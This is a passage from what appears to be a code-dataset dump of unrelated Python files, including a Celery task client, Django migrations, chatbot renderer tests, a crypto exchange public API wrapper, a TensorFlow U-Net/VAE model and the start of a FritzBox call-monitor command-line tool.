data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def get_predictions(self, path):
"""Read file and return predictions vector.
# Arguments
path: string file path.
# Returns
predictions: predictions vector.
"""
raise NotImplementedError
@abc.abstractmethod
def save_predictions(self, y_pred, path):
"""Write predictions vector to file.
# Arguments
y_pred: predictions vector.
path: string file path.
"""
raise NotImplementedError
class OpenerWrapper(object):
"""Internal wrapper to call opener interface."""
def __init__(self, interface, workspace=None):
assert isinstance(interface, Opener) or \
isinstance(interface, types.ModuleType)
self._workspace = workspace or Workspace()
self._interface = interface
@property
def data_folder_paths(self):
rootpath = self._workspace.input_data_folder_path
folders = [os.path.join(rootpath, subfolder_name)
for subfolder_name in os.listdir(rootpath)
if os.path.isdir(os.path.join(rootpath, subfolder_name))]
return folders
def get_X(self, fake_data=False):
if fake_data:
logger.info("loading X from fake data")
return self._interface.fake_X()
else:
logger.info("loading X from '{}'".format(self.data_folder_paths))
return self._interface.get_X(self.data_folder_paths)
def get_y(self, fake_data=False):
if fake_data:
logger.info("loading y from fake data")
return self._interface.fake_y()
else:
logger.info("loading y from '{}'".format(self.data_folder_paths))
return self._interface.get_y(self.data_folder_paths)
def get_predictions(self):
path = self._workspace.input_predictions_path
logger.info("loading predictions from '{}'".format(path))
return self._interface.get_predictions(path)
def save_predictions(self, y_pred):
path = self._workspace.output_predictions_path
logger.info("saving predictions to '{}'".format(path))
return self._interface.save_predictions(y_pred, path)
def load_from_module(path=None, workspace=None):
"""Load opener interface from path or from python environment.
Opener can be defined as an Opener subclass or directly has a module.
Return an OpenerWrapper instance.
"""
interface = utils.load_interface_from_module(
'opener',
interface_class=Opener,
interface_signature=REQUIRED_FUNCTIONS,
path=path,
)
return OpenerWrapper(interface, workspace=workspace)
| StarcoderdataPython |
6651784 | """
This module defines client service methods for celery result (for client
processing)
"""
from celery.result import ResultBase, AsyncResult
from conf.appconfig import TASK_SETTINGS
from deployer import util
from deployer.tasks.exceptions import TaskExecutionException
class TaskClient:
def __init__(self, celery_app):
self.celery_app = celery_app
def find_error_task(self, task, wait=False, raise_error=False,
timeout=TASK_SETTINGS['DEFAULT_GET_TIMEOUT']):
if not task or not isinstance(task, ResultBase):
return
if isinstance(task, AsyncResult):
if not task.ready() and wait:
task.get(propagate=raise_error, timeout=timeout)
if task.failed():
return task
elif task.status in ['PENDING'] and task.parent:
while task.parent:
if task.parent.failed():
return task.parent
else:
task = task.parent
else:
return self.find_error_task(task.result)
else:
return
def ready(self, id, wait=False, raise_error=False,
timeout=TASK_SETTINGS['DEFAULT_GET_TIMEOUT']):
@util.timeout(seconds=timeout)
@util.retry(10, delay=5, backoff=1, except_on=(IOError,))
def get_result():
status = 'READY'
output = self.celery_app.AsyncResult(id)
error_task = self.find_error_task(output, raise_error=False,
wait=wait, timeout=timeout)
if error_task:
output, status = \
error_task.result, error_task.status
if not isinstance(output, (TaskExecutionException,)):
output = TaskExecutionException(output,
error_task.traceback)
if raise_error:
raise output
else:
while isinstance(output, AsyncResult) and status is 'READY':
if wait:
output.get(timeout=timeout, propagate=raise_error)
if output.ready():
output = output.result
else:
status = 'PENDING'
output = None
if output:
try:
output = output.to_dict()
except AttributeError:
if not isinstance(output, dict) \
and not isinstance(output, list):
output = str(output)
return {
'status': status,
'output': output
}
return get_result()
| StarcoderdataPython |
1750768 | # Generated by Django 4.0 on 2022-01-25 21:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0006_ticketimage_external_url_alter_warehousereply_files'),
]
operations = [
migrations.RemoveField(
model_name='warehousereply',
name='files',
),
migrations.AlterField(
model_name='ticketimage',
name='ticket',
field=models.ManyToManyField(to='main.Tickets'),
),
migrations.CreateModel(
name='ReplyImage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file', models.FileField(blank=True, max_length=255, upload_to='replyfiles/%Y/%m/%d')),
('reply', models.ManyToManyField(to='main.WarehouseReply')),
],
),
]
| StarcoderdataPython |
6460734 | # SPDX-License-Identifier: ISC
# Copyright (c) 2013 <NAME> <<EMAIL>>
import unittest
class TestFilterRegistry(unittest.TestCase):
def test_all_filters_exist(self):
from afew import FilterRegistry
self.assertTrue(hasattr(FilterRegistry.all_filters, 'get'))
def test_entry_point_registration(self):
from afew import FilterRegistry
class FakeRegistry:
name = 'test'
def load(self):
return 'class'
registry = FilterRegistry.FilterRegistry([FakeRegistry()])
self.assertEqual('class', registry['test'])
def test_add_FilterRegistry(self):
from afew import FilterRegistry
try:
FilterRegistry.all_filters['test'] = 'class'
self.assertEqual('class', FilterRegistry.all_filters['test'])
finally:
del FilterRegistry.all_filters['test']
| StarcoderdataPython |
1602337 | from __future__ import print_function
import pendulum
import requests
import furl
from .constant import BASE_API_URL
class Public:
def __init__(self, url=None):
self.url = url if url is not None else BASE_API_URL
def ping(self):
""" See https://apidocs.stex.com/#/Public/get_public_ping """
return self.send_request(self.url + '/public/ping')
def currencies(self):
""" See https://apidocs.stex.com/#/Public/get_public_currencies """
return self.send_request(self.url + '/public/currencies')
def currencies_by_id(self, currency_id):
""" See https://apidocs.stex.com/#/Public/get_public_currencies__currencyId_ """
return self.send_request(self.url + '/public/currencies/' + str(currency_id))
def markets(self):
""" See https://apidocs.stex.com/#/Public/get_public_markets """
return self.send_request(self.url + '/public/markets')
def pairs_groups(self):
""" See https://apidocs.stex.com/#/Public/get_public_pairs_groups """
return self.send_request(self.url + '/public/pairs-groups')
def currency_pairs_list(self, code=None):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs_list__code_ """
if code is None:
code = 'ALL'
return self.send_request(self.url + '/public/currency_pairs/list/' + code)
def pairs_groups_by_id(self, currency_pair_group_id):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs_group__currencyPairGroupId_ """
return self.send_request(self.url + '/public/currency_pairs/group/' + str(currency_pair_group_id))
def currency_pairs_by_id(self, currency_pair_id):
""" See https://apidocs.stex.com/#/Public/get_public_currency_pairs__currencyPairId_ """
return self.send_request(self.url + '/public/currency_pairs/' + str(currency_pair_id))
def ticker(self):
""" See https://apidocs.stex.com/#/Public/get_public_ticker """
return self.send_request(self.url + '/public/ticker')
def ticker_by_currency_pair_id(self, currency_pair_id):
""" See https://apidocs.stex.com/#/Public/get_public_ticker__currencyPairId_ """
return self.send_request(self.url + '/public/ticker/' + str(currency_pair_id))
def trades_by_currency_pair_id(self, currency_pair_id, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_trades__currencyPairId_ """
if params is None:
params = {}
f = furl.furl(self.url + '/public/trades/' + str(currency_pair_id)).add(params)
return self.send_request(f.url)
def orderbook_by_currency_pair_id(self, currency_pair_id, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_orderbook__currencyPairId_"""
if params is None:
params = {}
f = furl.furl(self.url + '/public/orderbook/' + str(currency_pair_id)).add(params)
return self.send_request(f.url)
def chart(self, currency_pair_id, candles_type='1D', time_start=None, time_end=None, params=None):
""" See https://apidocs.stex.com/#/Public/get_public_chart__currencyPairId___candlesType_ """
now = pendulum.now('UTC')
if params is None:
params = {}
if time_start is None:
params['timeStart'] = now.subtract(weeks=1).int_timestamp
if time_end is None:
params['timeEnd'] = now.int_timestamp
f = furl.furl(self.url + '/public/chart/' + str(currency_pair_id) + '/' + candles_type).add(params)
return self.send_request(f.url)
@staticmethod
def send_request(url):
try:
r = requests.get(url)
return r.json()
except Exception as e:
return e
| StarcoderdataPython |
3384325 | <reponame>cotobadesign/cotoba-agent-oss
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import unittest.mock
from programy.clients.render.html import HtmlRenderer
class MockHtmlBotClient(object):
def __init__(self):
self._response = None
self.configuration = unittest.mock.Mock()
self.configuration.host = "127.0.0.1"
self.configuration.port = "6666"
self.configuration.api = "/api/web/v1.0/ask"
def process_response(self, client_context, response):
self._response = response
class HtmlRendererTests(unittest.TestCase):
def test_create_postback_url(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
postback = renderer.create_postback_url()
self.assertIsNotNone(postback)
self.assertEqual(postback, "#")
def test_text_only(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "Hello world")
self.assertEqual(mock_console._response, "Hello world")
def test_url_button(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<button><text>Hello</text><url>http://click.me</url></button>")
self.assertEqual(mock_console._response, '<a href="http://click.me">Hello</a>')
def test_postback_button(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<button><text>Hello</text><postback>HELLO</postback></button>")
self.assertEqual(mock_console._response, '<a class="postback" postback="HELLO" href="#">Hello</a>')
def test_link(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<link><text>Hello</text><url>http://click.me</url></link>")
self.assertEqual(mock_console._response, '<a href="http://click.me">Hello</a>')
def test_image(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "")
self.assertEqual(mock_console._response, '<img src="http://servusai.com/aiml.png" />')
def test_video(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<video>http://servusai.com/aiml.mov</video>")
texts = '<video src="http://servusai.com/aiml.mov">\n' + \
"Sorry, your browser doesn't support embedded videos, \n" + \
"but don't worry, you can " + '<a href="http://servusai.com/aiml.mov">download it</a>\n' + \
'and watch it with your favorite video player!\n' + \
'</video>'
self.assertEqual(mock_console._response, texts)
def test_card(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
texts1 = '<card><title>Servusai</title><subtitle>Home of ProgramY</subtitle>' + \
'<button><text>Hello</text><url>http://click.me</url></button></card>'
renderer.render("testuser", texts1)
texts2 = '<div class="card" ><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1>' + \
'<h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>'
self.assertEqual(mock_console._response, texts2)
def test_carousel(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
texts1 = '<carousel><card><title>Servusai</title><subtitle>Home of ProgramY</subtitle>' + \
'<button><text>Hello</text><url>http://click.me</url></button></card></carousel>'
renderer.render("testuser", texts1)
texts2 = '<div class="carousel"><div class="card" ><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1>' + \
'<h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>'
self.assertEqual(mock_console._response, texts2)
def test_reply_with_postback(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<reply><text>Hello</text><postback>HELLO</postback></reply>")
self.assertEqual(mock_console._response, '<a class="postback" postback="HELLO" href="#">Hello</a>')
def test_reply_without_postback(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<reply><text>Hello</text></reply>")
self.assertEqual(mock_console._response, '<a class="postback" postback="Hello" href="#">Hello</a>')
def test_delay(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<delay><seconds>0</seconds></delay>")
self.assertEqual(mock_console._response, '<div class="delay">...</div>')
def test_split(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<split />")
self.assertEqual(mock_console._response, "<br />")
def test_list(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<list><item>Item1</item><item>Item2</item></list>")
self.assertEqual(mock_console._response, "<ul><li>Item1</li><li>Item2</li></ul>")
def test_olist(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<olist><item>Item1</item><item>Item2</item></olist>")
self.assertEqual(mock_console._response, "<ol><li>Item1</li><li>Item2</li></ol>")
def test_location(self):
mock_console = MockHtmlBotClient()
renderer = HtmlRenderer(mock_console)
self.assertIsNotNone(renderer)
renderer.render("testuser", "<location />")
self.assertEqual(mock_console._response, "")
| StarcoderdataPython |
78105 | <reponame>SidneyAn/nfv
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common.event_log.objects.v1._event_log_data import EventLogData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_data import EventLogStateData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_data import EventLogThresholdData # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_CONTEXT # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_ID # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_IMPORTANCE # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_INITIATED_BY # noqa: F401
from nfv_common.event_log.objects.v1._event_log_defs import EVENT_TYPE # noqa: F401
| StarcoderdataPython |
3483737 | import re
number_of_strings = int(input())
char_ascii_num_list = list()
pattern = r"\!(?P<command>[A-Z][a-z]{2,})\!:\[(?P<text>[A-Za-z]{8,})\]"
for i in range(number_of_strings):
message = input()
matches = re.match(pattern, message)
if not matches:
print("The message is invalid")
else:
mach_command = matches.group('command')
for chr in matches.group('text'):
char_ascii_num_list.append(str(ord(chr)))
print(f"{mach_command}: {' '.join(char_ascii_num_list)}")
| StarcoderdataPython |
3415328 | from typing import Union
from fspider.downloadermiddlewares import DownloaderMiddleware
from fspider.http.request import Request
from fspider.http.response import Response
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh-HK;q=0.9,zh;q=0.8,en;q=0.7,la;q=0.6,ja;q=0.5',
'accept-encoding': 'gzip, deflate, br',
}
class DefaultHeadersMiddleware(DownloaderMiddleware):
def __init__(self):
super(DefaultHeadersMiddleware, self).__init__()
self._headers = self.settings.get('DEFAULT_REQUEST_HEADERS', DEFAULT_REQUEST_HEADERS)
async def process_request(self, request: Request) -> Union[Request, Response, None]:
for k, v in self._headers.items():
request.headers.setdefault(k, v)
| StarcoderdataPython |
1803127 | <filename>src/tenyksscripts/scripts/portlandtime.py
from datetime import datetime
from dateutil.tz import tzlocal
import pytz
import random
def run(data, settings):
if data['payload'] == 'portland time':
if random.random() > 0.3:
tz = pytz.timezone('America/Los_Angeles')
now = datetime.now(tzlocal())
now.replace(tzinfo=tz)
return now.astimezone(tz).strftime('%X')
else:
return "Don't you know?"
| StarcoderdataPython |
3426412 | from django.conf import settings
from storages.backends.s3boto3 import S3Boto3Storage
class StaticStorage(S3Boto3Storage):
location = settings.AWS_STATIC_LOCATION
class MediaStorage(S3Boto3Storage):
location = 'media'
file_overwrite = False
default_acl = 'public-read'
| StarcoderdataPython |
5020084 | """
Test that an alias can reference other aliases without crashing.
"""
from __future__ import print_function
import os
import time
import re
import lldb
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class NestedAliasTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.line = line_number('main.cpp', '// break here')
def test_nested_alias(self):
"""Test that an alias can reference other aliases without crashing."""
self.build()
exe = os.path.join(os.getcwd(), "a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break in main() aftre the variables are assigned values.
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped', 'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This is the function to remove the custom aliases in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('command unalias read', check=False)
self.runCmd('command unalias rd', check=False)
self.runCmd('command unalias fo', check=False)
self.runCmd('command unalias foself', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
self.runCmd('command alias read memory read -f A')
self.runCmd('command alias rd read -c 3')
self.expect(
'memory read -f A -c 3 `&my_ptr[0]`',
substrs=[
'deadbeef',
'main.cpp:',
'feedbeef'])
self.expect(
'rd `&my_ptr[0]`',
substrs=[
'deadbeef',
'main.cpp:',
'feedbeef'])
self.expect(
'memory read -f A -c 3 `&my_ptr[0]`',
substrs=['deadfeed'],
matching=False)
self.expect('rd `&my_ptr[0]`', substrs=['deadfeed'], matching=False)
self.runCmd('command alias fo frame variable -O --')
self.runCmd('command alias foself fo self')
self.expect(
'help foself',
substrs=[
'--show-all-children',
'--raw-output'],
matching=False)
self.expect(
'help foself',
substrs=[
'Show variables for the current',
'stack frame.'],
matching=True)
| StarcoderdataPython |
5176533 | """
"Macro-profiling" section example of invoking cProfile
Python profiles from Python script
"""
import time
import cProfile
def medium():
time.sleep(0.01)
def light():
time.sleep(0.001)
def heavy():
for i in range(100):
light()
medium()
medium()
time.sleep(2)
def main():
for i in range(2):
heavy()
if __name__ == '__main__':
profiler = cProfile.Profile()
profiler.runcall(main)
profiler.print_stats()
| StarcoderdataPython |
1629511 | import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow import layers
import numpy as np
import csv
import sys
import os
# Import utility functions from 'utils.py' file
from utils import checkFolders, show_variables, add_suffix, backup_configs
# Import convolution layer definitions from 'convolution layers.py' file
from convolution_layers import conv2d_layer, inception_v3, transpose_conv2d_layer, transpose_inception_v3, dense_layer, factored_conv2d, upsample
"""
U-Net model with optional KL-divergence (post-activation),
decoder-only batch-normalization, optional upsampling,
and probabilistic loss according to MVN prediction.
"""
# Encoder component of VAE model
def encoder(self, x, training=True, reuse=None, name=None):
# Unpack data
data, mesh, __ = x
if self.use_noise_injection:
interior_indices = tf.greater(mesh, 0)
zero_tensor = tf.zeros_like(data)
noisy_data = tf.distributions.Normal(loc=data, scale=self.noise_level*tf.ones_like(data), name='noisy_data').sample()
data = tf.cond(training, lambda: noisy_data, lambda: data)
data = tf.where(interior_indices, data, zero_tensor)
if not (self.alt_res == 128):
data = tf.image.resize_images(data, [self.alt_res, self.alt_res])
# [None, 64, 64, 1] --> [None, 32, 32, 16]
h1 = conv2d_layer(data, 48, kernel_size=5, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_1')#, coordconv=self.coordconv)
h1 = layers.max_pooling2d(h1, 2, 2, padding='same', data_format='channels_last', name='e_pool_1')
# [None, 32, 32, 16] --> [None, 16, 16, 32]
if self.factor:
h2 = factored_conv2d(h1, 48, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_2')
h2 = layers.max_pooling2d(h2, 2, 2, padding='same', data_format='channels_last', name='e_pool_2')
else:
h2 = conv2d_layer(h1, 48, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_2')#, coordconv=self.coordconv)
h2 = layers.max_pooling2d(h2, 2, 2, padding='same', data_format='channels_last', name='e_pool_2')
h3 = inception_v3(h2, 80, stride=1, batch_norm=False, training=training, reuse=reuse, name='e_incept_1')
# [None, 16, 16, 64] --> [None, 8, 8, 64]
h4 = conv2d_layer(h3, 80, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_3')#, coordconv=self.coordconv)
h4 = layers.max_pooling2d(h4, 2, 2, padding='same', data_format='channels_last', name='e_pool_3')
if self.use_inception:
h5 = inception_v3(h4,150, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_incept_4')
h5 = layers.max_pooling2d(h5, 2, 2, padding='same', data_format='channels_last', name='e_pool_4')
else:
h5 = conv2d_layer(h4, 150, kernel_size=3, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_4')#, coordconv=self.coordconv)#, activation=None)
h5 = layers.max_pooling2d(h5, 2, 2, padding='same', data_format='channels_last', name='e_pool_4')
chans = 512 if self.use_kl else 256
omit = True if self.use_kl else False
h6 = inception_v3(h5, chans, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='e_incept_5',
omit_activation=omit)
h6 = layers.max_pooling2d(h6, 2, 2, padding='same', data_format='channels_last', name='e_pool_5')
if self.coordconv:
h6 = conv2d_layer(h6, chans, kernel_size=2, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='e_conv_6', coordconv=self.coordconv)
if not self.use_kl:
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
elif self.use_extra_dropout:
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
return h1, h2, h3, h4, h5, h6
# Decoder component of VAE model
def decoder(self, z, training=True, reuse=None, name=None):
# Note: h2 and h3 have same resolution
h1, h2, h3, h4, h5, h6 = z
# h6 ~ [None, 4, 4, 256]
h = h6
h = inception_v3(h, 256, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_incept_0')
h = tf.layers.dropout(h, rate=self.dropout_rate, training=training)
if self.coordconv:
h = conv2d_layer(h, 256, kernel_size=2, batch_norm=False, regularize=self.regularize, training=training, reuse=reuse, name='d_conv_0', coordconv=self.coordconv)
# [None, 4, 4, 256] --> [None, 8, 8, 128]
stride = 1 if self.interpolate else 2
h = transpose_conv2d_layer(h, 150, kernel_size=2, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_0')#, coordconv=self.coordconv)
if self.interpolate:
h = upsample(h, 4*2)
h = tf.concat([h, h5],3)
# [None, 8, 8, 64] --> [None, 16, 16, 64]
h = transpose_conv2d_layer(h, 80, kernel_size=2, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_1')#, coordconv=self.coordconv)
if self.interpolate:
h = upsample(h, 4*2*2)
h = tf.concat([h, h4],3)
# [None, 16, 16, 64] --> [None, 32, 32, 32]
if self.symmetric:
h = transpose_inception_v3(h, 80, stride=stride, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_tincept_2')
else:
h = transpose_inception_v3(h, 80, stride=stride, batch_norm=self.use_bn, regularize=self.regularize, training=training, reuse=reuse, name='d_tincept_2')
if self.interpolate:
h = upsample(h, 4*2*2*2)
h = tf.concat([h, h3],3)
# [None, 32, 32, 32] --> [None, 64, 64, 16]
h_m = transpose_conv2d_layer(h, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=1, training=training, reuse=reuse, name='d_tconv_2_1')#, coordconv=self.coordconv)
h_m = transpose_conv2d_layer(h_m, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_2_2')
h_s = transpose_conv2d_layer(h, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=1, training=training, reuse=reuse, name='d_tconv_2_1_s')#, coordconv=self.coordconv)
h_s = transpose_conv2d_layer(h_s, 48, kernel_size=3, batch_norm=self.use_bn, regularize=self.regularize, stride=stride, training=training, reuse=reuse, name='d_tconv_2_2_s')
if self.interpolate:
h_m = upsample(h_m, 4*2*2*2*2)
h_s = upsample(h_s, 4*2*2*2*2)
#h = tf.concat([h, h1],3)
# [None, 64, 64, 16] --> [None, 128, 128, 1]
s = transpose_conv2d_layer(h_s, 1, kernel_size=6, batch_norm=False, stride=2, activation=None,
add_bias=False, training=training, reuse=reuse, name='d_tconv_3_s')
h = transpose_conv2d_layer(h_m, 1, kernel_size=6, batch_norm=False, stride=2, activation=None,
add_bias=False, training=training, reuse=reuse, name='d_tconv_3_m')
# Assign name to final output
return tf.identity(h, name=name), s
# Evaluate model on specified batch of data
def evaluate_model(self, data, reuse=None, training=True, suffix=None):
# Encode input images
z = self.encoder(self, data, training=training, reuse=reuse, name=add_suffix("encoder", suffix))
# Sample in latent spaces
if self.use_kl:
h1, h2, h3, h4, h5, h6 = z
m, log_s = tf.split(h6, num_or_size_splits=2, axis=3)
h6 = self.sampleGaussian(m, log_s, name='latent_sample')
h6 = tf.layers.dropout(h6, rate=self.dropout_rate, training=training)
z = [h1, h2, h3, h4, h5, h6]
#if self.reduce_noise:
# # Use KL divergence w.r.t. N(0, 0.1*I)
# # by comparing with 10*sigma ~ log(10*sigma) ~ log(10) + log(sigma)
# kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,tf.add(10.0*tf.ones_like(log_s),log_s))])
#else:
# kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,log_s)])
kl_loss = self.kl_wt*tf.reduce_sum([self.compute_kl_loss(m,log_s)])
else:
h1, h2, h3, h4, h5, h6 = z
h6 = tf.nn.leaky_relu(h6)
z = [h1, h2, h3, h4, h5, h6]
# Compute Kullback–Leibler (KL) divergence
kl_loss = self.kl_wt
# Decode latent vector back to original image
pred = self.decoder(self, z, training=training, reuse=reuse, name=add_suffix("pred", suffix))
# Compute marginal likelihood loss
masked_soln, masked_pred, masked_scale, interior_loss, boundary_loss, prob_loss = self.compute_ms_loss(data, pred, name=add_suffix("ms_loss", suffix))
# Assign names to outputs
masked_soln = tf.identity(masked_soln, name=add_suffix('masked_soln', suffix))
masked_pred = tf.identity(masked_pred, name=add_suffix('masked_pred', suffix))
masked_scale = tf.identity(masked_scale, name=add_suffix('masked_scale', suffix))
return masked_soln, masked_pred, masked_scale, interior_loss, boundary_loss, kl_loss, prob_loss
| StarcoderdataPython |
1706798 | <filename>tests/test_entities.py
"""Tests entities."""
import unittest
from monitor.entities import IssueMeta, IssueCommentMeta, GitHubAuthorAssociations
class TestEntities(unittest.TestCase):
"""Tests entities."""
def test_issue(self):
"""Tests meta issue class."""
issue = IssueMeta(title="Awesome issue",
number=42,
state="open",
assignee="AwesomePerson",
author_association=GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
comments=[
IssueCommentMeta(user="AwesomeCommentor",
author_association=
GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
user_type="User")
],
user="AwesomeAuthor")
self.assertEqual(GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
issue.last_commenter_type)
def test_issue_to_dict(self):
"""Tests converting to dict."""
issue = IssueMeta(title="Awesome issue",
number=42,
state="open",
assignee="AwesomePerson",
author_association=GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
comments=[
IssueCommentMeta(user="AwesomeCommentor",
author_association=
GitHubAuthorAssociations.FIRST_TIME_CONTRIBUTOR,
user_type="User")
],
user="AwesomeAuthor")
reference_dict = {
'assignee': 'AwesomePerson',
'author_association': 'FIRST_TIME_CONTRIBUTOR',
'days_since_create_date': 0,
'days_since_last_member_comment': None,
'days_since_last_update': 0,
'days_since_last_user_comment': 0,
'is_authored_by_or_last_commented_by_community': True,
'labels': [],
'last_commented_by': 'AwesomeCommentor',
'last_commenter_type': 'FIRST_TIME_CONTRIBUTOR',
'number': 42,
'pull_request': None,
'state': 'open',
'title': 'Awesome issue',
'user': 'AwesomeAuthor'
}
self.assertEqual(issue.to_dict(), reference_dict)
| StarcoderdataPython |
3453184 | """"
Module to inspect phone-call events in real time.
This is the command line interface for the core.fritzmonitor module
and should serve as an example how to use an instance of FritzMonitor.
To run this, the CallMonitor service of the box has to be activated.
This can be done with any registered Phone by typing the following codes:
activate: #96*5*
deactivate: #96*4*
"""
# This module is part of the FritzConnection package.
# https://github.com/kbr/fritzconnection
# License: MIT (https://opensource.org/licenses/MIT)
# Author: <NAME>
import argparse
import queue
from ..core.fritzmonitor import (
FritzMonitor,
FRITZ_IP_ADDRESS,
FRITZ_MONITOR_SOCKET_TIMEOUT,
)
from .. import __version__
HEALTHCHECK_TIMEOUT = 10
def print_header(args):
print(f"\nfritzconnection v{__version__}")
print(f"start fritzmonitor on address: {args.address}")
print(f"settings for socket-timeout: {args.timeout} [sec]")
print(f"settings for healthcheck-timeout: {args.healthcheck} [sec]")
print("(to stop press ^C)\n")
def get_cli_arguments():
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--ip-address",
nargs="?",
default=FRITZ_IP_ADDRESS,
const=None,
dest="address",
help="Specify ip-address of the FritzBox to connect to."
"Default: %s" % FRITZ_IP_ADDRESS,
)
parser.add_argument(
"-t",
